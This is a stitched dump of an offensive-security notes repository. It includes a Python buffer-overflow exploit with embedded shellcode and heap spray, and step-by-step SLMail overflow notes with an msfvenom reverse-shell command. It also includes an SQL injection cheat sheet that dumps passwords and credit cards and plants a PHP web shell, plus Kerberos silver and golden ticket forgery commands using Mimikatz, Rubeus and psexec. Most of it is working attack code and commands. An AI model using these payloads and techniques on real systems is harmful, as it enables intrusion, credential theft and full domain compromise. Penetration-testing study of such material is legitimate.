52 | shellcode += "\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
53 | shellcode += "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
54 | 
55 | payload = (nopsled + jmp_esp + egghunter).encode('hex')
56 | 
57 | #fuzz = ''
58 | #fuzz += 'A' * (72 - 8)
59 | #fuzz += 'B' * 8
60 | #fuzz += 'C' * 8
61 | #fuzz += 'D' * 80
62 | 
63 | # print payload
64 | 
65 | # Spray the shellcode, then the egghunter can look for it
66 | for i in range(0, 5):
67 |     print 'Spray ' + str(i)
68 |     requests.post(url, data=shellcode)
69 | ###
70 | 
71 | # With this proxy, we can intercept the outgoing http request with burp and remove
72 | # stuff that might take up our buffer space
73 | proxy = {'http':'127.0.0.1:8080'}
74 | 
75 | print 'Sending payload...'
76 | r = requests.head(url + '/' + payload, proxies=proxy)
77 | print payload
78 | print r.text
79 | 
80 | 


--------------------------------------------------------------------------------
/binary_exploitation/buffer_overflow/remote_overflow.txt:
--------------------------------------------------------------------------------
 1 | Steps needed to trigger a remote buffer overflow (example used was SLMail_5.5.0 with immunity debugger)(See ~/KaliPentestCommands/BufferOverflow/immunityDbg.txt)
 2 | 
 3 | 	Step 1 : Recreate the service on a virtual machine with the same OS version as the target's machine.
 4 | 	Step 2 : Fuzz the service (~/KaliPentestCommands/BufferOverflow/remote_overflow.py).
 5 | 	Step 3 : Use pattern_create and pattern_offset to find the exact location of the crash (take the 'EIP' value after the crash and use it with 'pattern_offset.rb').
 6 | 	Step 4 : Append characters after a string buffer of that offset size and check the EIP if those characters are correct, then append more to see if they allocate memory.
 7 | 	Step 5 : Right click 'ESP' -> 'Follow in dump' to see memory.
 8 | 	Step 5 : Find bad characters using my 'remote_overflow.py' script.
 9 | 	Step 6 : Edit the badchars list in the 'remote_overflow.py' script and redo the script everytime (save the badchars and remove them from the list).
10 | 		 You can find bad chars by doing 'follow dump' on 'ESP' and checking the hex dumps '01 02 03 FE' or something similar means that '0x04' is a bad character.
11 | 		 Repeat this until the hex dump lists all the characters in the 'badchars' list.
12 | 	
13 | 	Step 7 : Use mona to find modules with ASLR and DEP disabled, the module's memory range shouldn't contain any bad characters. (addresses you use for this part should never contain bad characters)
14 | 		 (!p mona modules)
15 | 	Step 8 : Once you have found this module, go to the 'executable modules list' (e), then look for the module you found in step 7 and double-click on it
16 | 	Step 9 : Right click the assembly pane -> 'search for -> command -> "jmp esp"' (if not found, 'search for -> sequence of commands -> "push esp \n retn"')(the \n is an actual newline)
17 | 	Step 10: Go to 'modules list' (m) to check permissions
18 | 	Step 11: Find opcode equivalent to 'jmp esp' by using '/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb' with 'jmp esp' -> result: FFE4
19 | 	Step 12: Search for the opcode with mona command: !mona find -s "<opcode>" -m <moduleName>	# example: !mona find -s "\xff\xe4" -m slmfc.dll
20 | 	Step 13: Look for an address with no bad characters and verify that it contains a 'jmp esp' instruction by clicking on the top bar '->:' button and enter the found address.
21 | 		 Check the instruction for 'jmp esp'
22 | 
23 | 	Step 14: Add that address to your script's buffer where the address will overwrite EIP so that it will point to 'jmp esp'. This will eventually lead us to executing our shellcode.
24 | 		 You have to reverse the address (x86 little endian format) and convert it to shellcode (5F4A358F -> \x8f\x35\x4a\x5f), then after the address, add more buffer chars>
25 | 		 Python example: buffer = "A"*2606 + \x8f\x35\x4a\x5f + "C"*(3500-2610)
26 | 
27 | 	Step 15: Restart immunity and slmail, place a breakpoint on that found address (->:) and run the exploit again
28 | 	Step 16: Generate shellcode, while avoiding bad characters 
29 | 		 # msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.0.124 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' EXITFUNC=thread -f python -v shellcode
30 | 	
31 | 	Step 17: Use this payload after the 'jmp esp' payload (maybe add a few 'nopsled(\x90)' chars) and add padding at the end
32 | 
33 | 	Examples of finished exploit script:
34 | 
35 | 		python pop3exploit.py 192.168.0.117 110
36 | 
37 | 		python pop3exploit.py 192.168.0.117 110 2700
38 | 
39 | 		python pop3exploit.py pattern 192.168.0.117 110 `python -c 'print "A"*2606 + "\x8f\x35\x4a\x5f" + "C"*(3500-2610)'`
40 | 
41 | 		python pop3exploit.py badchars 192.168.0.117 110 `python -c 'print "A"*2606 + "B"*4'`
42 | 			
43 | 		python pop3exploit.py shellcode 192.168.0.117 110 `python -c 'print "A"*2606 + "\x8f\x35\x4a\x5f" + "\x90"*20'` `python -c 'print "C"*(3500-2606-10-341)'`
44 | 


--------------------------------------------------------------------------------
/filetransfer/smb_server.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
 3 | #
 4 | # This software is provided under under a slightly modified version
 5 | # of the Apache Software License. See the accompanying LICENSE file
 6 | # for more information.
 7 | #
 8 | # Simple SMB Server example.
 9 | #
10 | # Author:
11 | #  Alberto Solino (@agsolino)
12 | #
13 | 
14 | import sys
15 | import argparse
16 | import logging
17 | 
18 | from impacket.examples import logger
19 | from impacket import smbserver, version
20 | from impacket.ntlm import compute_lmhash, compute_nthash
21 | 
22 | if __name__ == '__main__':
23 | 
24 |     # Init the example's logger theme
25 |     logger.init()
26 |     print version.BANNER
27 | 
28 |     parser = argparse.ArgumentParser(add_help = True, description = "This script will launch a SMB Server and add a "
29 |                                      "share specified as an argument. You need to be root in order to bind to port 445. "
30 |                                      "No authentication will be enforced. Example: smbserver.py -comment 'My share' TMP "
31 |                                      "/tmp")
32 | 
33 |     parser.add_argument('shareName', action='store', help='name of the share to add')
34 |     parser.add_argument('sharePath', action='store', help='path of the share to add')
35 |     parser.add_argument('-comment', action='store', help='share\'s comment to display when asked for shares')
36 |     parser.add_argument('-username', action="store", help='Username to authenticate clients')
37 |     parser.add_argument('-password', action="store", help='Password for the Username')
38 |     parser.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes for the Username, format is LMHASH:NTHASH')
39 |     parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
40 |     parser.add_argument('-ip', '--interface-address', action='store', default='0.0.0.0', help='ip address of listening interface')
41 |     parser.add_argument('-port', action='store', default='445', help='TCP port for listening incoming connections (default 445)')
42 |     parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)')
43 | 
44 |     if len(sys.argv)==1:
45 |         parser.print_help()
46 |         sys.exit(1)
47 | 
48 |     try:
49 |        options = parser.parse_args()
50 |     except Exception, e:
51 |        logging.critical(str(e))
52 |        sys.exit(1)
53 | 
54 |     if options.debug is True:
55 |         logging.getLogger().setLevel(logging.DEBUG)
56 |     else:
57 |         logging.getLogger().setLevel(logging.INFO)
58 | 
59 |     if options.comment is None:
60 |         comment = ''
61 |     else:
62 |         comment = options.comment
63 | 
64 |     server = smbserver.SimpleSMBServer(listenAddress=options.interface_address, listenPort=int(options.port))
65 | 
66 |     server.addShare(options.shareName.upper(), options.sharePath, comment)
67 |     server.setSMB2Support(options.smb2support)
68 | 
69 |     # If a user was specified, let's add it to the credentials for the SMBServer. If no user is specified, anonymous
70 |     # connections will be allowed
71 |     if options.username is not None:
72 |         # we either need a password or hashes, if not, ask
73 |         if options.password is None and options.hashes is None:
74 |             from getpass import getpass
75 |             password = getpass("Password:")
76 |             # Let's convert to hashes
77 |             lmhash = compute_lmhash(password)
78 |             nthash = compute_nthash(password)
79 |         elif options.password is not None:
80 |             lmhash = compute_lmhash(options.password)
81 |             nthash = compute_nthash(options.password)
82 |         else:
83 |             lmhash, nthash = options.hashes.split(':')
84 | 
85 |         server.addCredential(options.username, 0, lmhash, nthash)
86 | 
87 |     # Here you can set a custom SMB challenge in hex format
88 |     # If empty defaults to '4141414141414141'
89 |     # (remember: must be 16 hex bytes long)
90 |     # e.g. server.setSMBChallenge('12345678abcdef00')
91 |     server.setSMBChallenge('')
92 | 
93 |     # If you don't want log to stdout, comment the following line
94 |     # If you want log dumped to a file, enter the filename
95 |     server.setLogFile('')
96 | 
97 |     # Rock and roll
98 |     server.start()
99 | 


--------------------------------------------------------------------------------
/databases/sql/sqli.txt:
--------------------------------------------------------------------------------
 1 | SQL Injection attack steps(start from -> http://vulnsite.com/clients.php?id=150):
 2 | 
 3 | 	# Important note! For Sql injection comments (--) to work, you need to include a space at the end (-- ) or (-- -) 
 4 | 
 5 | 	Step 1: id=150'	-> if sql error is not visible, you need to do blind SQL injection
 6 | 
 7 | 	Step 2: id=150 order by 1-- -
 8 | 	# Try to use ;# at the end to comment out the next query
 9 | 	# Increment the order number until you hit error to find out how many columns there are
10 | 	# Say you get an error at 'id=150 order by 9-- -' -> this means there are 8 columns available
11 | 
12 | 	Step 3: id=150 union select 1,2,3,4,5,6,7,8
13 | 	# See what column numbers appear on the website somewhere, those are vulnerable
14 | 	# Say we only see column 3, 5 and 8 on the screen
15 | 
16 | 	Step 4: id=150 union all select 1,2,user(),4,@@version,6,7,8
17 | 
18 | 	Step 5: id=150 union all select 1,2,3,4,table_name,6,7,8 FROM information_schema.tables
19 | 	# extract all tablenames
20 | 	# This is the syntax for SQL Server, might not work for other SQL versions
21 | 
22 | 	Step 6: id=150 union all select 1,2,3,4,5,6,7,column_name FROM information_schema.columns where table_name='<tableName>'
23 | 	# Say we find table 'clients' with columns 'name', 'password', 'credit_card', 'not_important'
24 | 
25 | 	Step 7: id=150 union select 1,2,name,4,password,6,7,credit_card FROM clients
26 | 	# This will dump all the data on the website for us to see
27 | 	# (if it's a stored SQL injection, anyone who browses to that page will see the data dump)
28 | 
29 | 
30 | Sql injection queries:
31 | 	
32 | 	Test for vulnerable columns (sometimes you need to limit to 1 result and supply a negative index so we can properly see output):
33 | 
34 | 		syntax : http://vulnerable.org/items?id=-1 union all select <columns> LIMIT 1-- -
35 | 		example: http://vulnerable.org/items?id=-1 union all select 1,2,3,4,5,6,7 LIMIT 1-- -
36 | 
37 | 
38 | 	Load a file's contents if permission is enabled:
39 | 		
40 | 		syntax : id=150 union all select 1,2,3,4,5,6,7,load_file("<remoteFilePath>")
41 | 		example: id=150 union all select 1,2,3,4,5,6,7,load_file("c:\Users\Derrick\Desktop\password.txt")
42 | 
43 | 
44 | 	Upload a file to a remote server if permission is enabled:
45 | 		
46 | 		syntax : id=150 union all select 1,2,3,4,"<contents>",6,7,8 into outfile '<outFile>'
47 | 		example: id=150 union all select 1,2,3,4,"<?php echo shell_exec($_REQUEST['cmd']);?>",6,7,8 into outfile '/var/www/html/upload.php'
48 | 
49 | 
50 | Useful queries per database version:
51 | 
52 | 	MYSQL:
53 | 		Blind SQL Injection:
54 |             # time-based
55 | 			syntax : ' AND (SELECT CASE WHEN ((SELECT hex(substr(<column>,<index>,1)) FROM <table> LIMIT <offset>,1) = hex('<character>')) THEN sleep(<time>) ELSE 0 END));-- -
56 | 			example: ' AND (SELECT CASE WHEN ((SELECT hex(substr(table_name,1,1)) FROM information_schema.tables LIMIT 0,1) = hex('a')) THEN sleep(5) ELSE 0 END));-- -
57 | 
58 |             # boolean-based
59 |             syntax : ' AND (SELECT CASE WHEN ((SELECT hex(substr(<column>,1,1)) FROM <table> LIMIT <offset>,1) = hex('<character>')) THEN 1 ELSE 0 END));-- -
60 | 			example: ' AND (SELECT CASE WHEN ((SELECT hex(substr(table_name,1,1)) FROM information_schema.tables LIMIT 0,1) = hex('a')) THEN 1 ELSE 0 END));-- -
61 | 
62 | 	MSSQL:
63 |         Blind SQL Injection:
64 |             # error-based enumerate readable databases
65 |             syntax : or 1 in (SELECT TOP 1 CAST(db_name(<index>) as varchar(4096)));-- -
66 |             example: or 1 in (SELECT TOP 1 CAST(db_name(1) as varchar(4096)));-- -
67 | 
68 |             # error-based enumerate database tables
69 |             syntax : or 1 in (SELECT TOP 1 CAST(<column> as varchar(4096)) FROM <database_name>..<table> WHERE xtype='U' and <column> NOT IN (<known_table_list>)); -- -
70 |             example: or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM master..sysobjects WHERE xtype='U' and name NOT IN ('users', 'employees')); -- -
71 | 
72 |             # error-based enumerate table columns
73 |             syntax : or 1 in (SELECT TOP 1 CAST (<database>..syscolumns.name as varchar(4096)) FROM <database>..syscolumns, <database>..sysobjects WHERE <database>..syscolumns.id=<database>..sysobjects.id
74 |                       AND <database>..sysobjects.name=<table_name> AND <database>..syscolumns.name NOT IN (<known_column_list>)); -- -
75 |             example: or 1 in (SELECT TOP 1 CAST (cms..syscolumns.name as varchar(4096)) FROM cms..syscolumns, cms..sysobjects WHERE cms..syscolumns.id=cms..sysobjects.id
76 |                       AND cms..sysobjects.name=cms_users AND cms..syscolumns.name NOT IN ('id', 'username', 'address')); -- -
77 | 
78 |             # error-based extract column data
79 |             syntax : or 1 in (SELECT TOP 1 CAST (<column> as varchar(4096)) FROM <database>..<table> WHERE <column> NOT IN (<retrieved_data_list>)); -- -
80 |             example: or 1 in (SELECT TOP 1 CAST (password as varchar(4096)) FROM cms..cms_users WHERE password NOT IN ('P@ssw0rD!', 'Sup3rS3cur3!', 'Summer2020')); -- -
81 | 
82 |             # for more: https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/
83 | 
84 |             
85 | 	SQLITE:
86 |         Blind SQL Injection:
87 |             # boolean-based
88 |             syntax : " AND (SELECT CASE WHEN ((SELECT hex(substr(<column>,<index>,1)) FROM <table> LIMIT <offset>,1) = hex('<character>')) then match(1,1) END))-- -
89 |             example: " AND (SELECT CASE WHEN ((SELECT hex(substr(name,1,1)) FROM sqlite_master LIMIT 0,1) = hex('a')) then match(1,1) END))-- -
90 | 


--------------------------------------------------------------------------------
/windows/active_directory/tickets.txt:
--------------------------------------------------------------------------------
 1 | Create silver/golden tickets to gain access to a domain via Impacket (https://github.com/SecureAuthCorp/impacket) or other tools.
 2 | 
 3 | Create silver ticket (forged service ticket) with nt hash of a local machine account:
 4 |     # NOTE: Your datetime might have to be synced with that of the Domain Controller for this to work! (use tools like rdate or set it manually)
 5 |     
 6 |     Step 1 - Grab the NTLM hash of the local machine account
 7 |     Step 2 - Create the silver ticket:
 8 |         Impacket:
 9 |             syntax : python ticketer.py -nthash <ntHash> -domain-sid <domainSID> -domain <domainFQDN> -spn <serviceSPN>/<victimHost> <user>
10 |             example: python ticketer.py -nthash 2c9b172b854d7203c6fd6256a6d2ef78  -domain-sid S-1-5-21-4265912246-3485035794-2943778638 -domain ecorp.local -spn cifs/dc.ecorp.local tyrell
11 |         
12 |         Mimikatz:
13 |             syntax : kerberos::golden /user:<domainUserToImpersonate> /domain:<domainFQDN> /sid:<domainSID> /target:<targetComputerFQDN> /service:<service> /rc4:<machineAccountNTLM> /ticket:<outFile>.kirbi
14 |             example: kerberos::golden /user:administrator /domain:ecorp.local /sid:S-1-5-23-2132823697-1814333505-1834004911 /target:DEV-1.ecorp.local /service:HTTP /rc4:2c9b172b854d7203c6fd6256a6d2ef78 /ticket:winrm_dev-1_silver.kirbi
15 |             example: kerberos::golden /user:administrator /domain:ecorp.local /sid:S-1-5-23-2132823697-1814333505-1834004911 /target:DEV-1.ecorp.local /service:HTTP /altservice:winrm,host,http,ldap,cifs /rc4:2c9b172b854d7203c6fd6256a6d2ef78 /ticket:dev-1_silver.kirbi
16 |         
17 | 	Optional step 3 - Convert the silver ticket contents to base64 with Powershell (the ticket will be on the victim machine):
18 |         syntax : [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("<pathToTicket>"))
19 |         example: [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\Users\d.admin\Desktop\winrm_dev-1_silver.kirbi"))
20 | 
21 |     Step 4 - Inject the ticket into your current CMD/Powershell process with Rubeus:
22 |         syntax : Rubeus.exe ptt /ticket:<base64Ticket>
23 |         example: Rubeus.exe ptt /ticket:doQAAAV9MI...5o==
24 | 
25 |         # doesn't have to be a base64 encoded ticket for this
26 |         syntax : Rubeus.exe ptt /ticket:<pathToTicketFile>
27 |         example: Rubeus.exe ptt /ticket:C:\Users\Hacker\Documents\ticket.kirbi
28 | 
29 | Create golden ticket to get access to any account in the domain:
30 |     Step 1 - Grab the NTLM hash of the krbtgt account (use dcsync, dump the hashes from a Domain Controller... (domain admin))
31 |     Step 2 - Create the golden ticket with Mimikatz:
32 |         syntax : kerberos::golden /user:<userToImpersonate> /domain:<domainFQDN> /sid:<domainSID> /krbtgt:<krbtgtNTLM> /ticket:<outFile>.kirbi
33 |         example: kerberos::golden /user:administrator /domain:ecorp.local /sid:S-1-5-23-2132823697-1814333505-1834004911 /krbtgtb:7eff226e37bed6f0373e6eafe01abc36 /ticket:golden.kirbi
34 | 
35 |     Optional step 3 - Convert the golden ticket contents to base64 with Powershell (the ticket will be on the victim machine):
36 |         syntax : [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("<pathToTicket>")) 
37 |         example: [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\Users\d.admin\Desktop\golden.kirbi"))
38 | 
39 |     Step 4 - Inject the ticket into your current CMD/Powershell process with Rubeus:
40 |         syntax : Rubeus.exe ptt /ticket:<base64Ticket>
41 |         example: Rubeus.exe ptt /ticket:doQAAAV9MI...5o==
42 | 
43 |         # doesn't have to be a base64 encoded ticket for this
44 |         syntax : Rubeus.exe ptt /ticket:<pathToTicketFile>
45 |         example: Rubeus.exe ptt /ticket:C:\Users\Hacker\Documents\ticket.kirbi
46 | 
47 | Create a golden SID history ticket to become Enterprise Admin in a forest (from child Domain Admin to forest Enterprise Admin):
48 |     Mimikatz create and inject golden SID history ticket into current CMD/Powershell process:
49 |         syntax : kerberos::golden /user:<userToImpersonate> /domain:<currentDomainFQDN> /sid:<currentDomainSID> /sids:<parentDomainGroupSID> /krbtgt:<krbtgtNTLM> /ticket:<outFile>.kirbi /ptt
50 |         example: kerberos::golden /user:ealderson /domain:wm.ecorp.local /sid:S-1-5-21-2821111923-2089308390-2654120211 /sids:S-1-5-21-2821111923-2081302390-2674520254-519 /krbtgt:7eff226e37bed6f0373e6eafe01abc36 /ticket:golden_ea.kirbi /ptt
51 | 
52 | Use the silver/golden ticket to gain access to the domain via kerberos auth via attacker machine (use SOCKS proxy with proxychains):
53 |     optional step - convert the ticket from Windows to Linux format (ticket should not be base64 encoded):
54 |         # [IO.File]::WriteAllBytes("<output>.kirbi", [Convert]::FromBase64String("<bas64_ticket>.kirbi"))
55 |         syntax : kirbi2ccache <input>.kirbi <output>.ccache
56 |         example: kirbi2ccache golden.kirbi golden.ccache
57 |         
58 |         # if ticket is base64 encoded, either decode it or use https://github.com/SolomonSklash/RubeusToCcache
59 |         syntax : rubeustoccache.py <b64_ticket>.kirbi <output>.kirbi <output>.ccache
60 |         example: rubeustoccache.py b64_ticket.kirbi golden.kirbi golden.ccache
61 | 
62 |     step 1 - set the ticket as an environmental variable (default path is /tmp):
63 |         syntax : export KRB5CCNAME=<TGS_ccache_file>.ccache     # the output file of the silver/golden ticket creation (ccache file)
64 | 
65 |     step 2 - use pass-the-hash tools on the desired host (or any impacket tools that support this):
66 |         syntax : python psExec.py <domainName>/<user>@<victimHost> -k -no-pass
67 |         example: proxychains python psExec.py ecorp.local/tyrell@10.13.14.15 -k -no-pass
68 |     
69 |         # NOTE: you'd need a silver ticket for winrm spn for this to work (usually HOST or HTTP)
70 |         syntax : evil-winrm -r <domain> -i <subdomain>
71 |         example: proxychains evil-winrm -r ECORP.LOCAL -i dc.ecorp.local    # https://github.com/Hackplayers/evil-winrm -> check section on kerberos auth
72 |     
73 |         # atexec.py runs commands through Task Scheduler on the victim Windows machine
74 |         syntax : python atexec.py -k -no-pass <domain>/<user>@<subdomain> <command>
75 |         example: proxychains python atexec.py -k -no-pass ECORP.LOCAL/administrator@web1.ecorp.local 'whoami'
76 | 


--------------------------------------------------------------------------------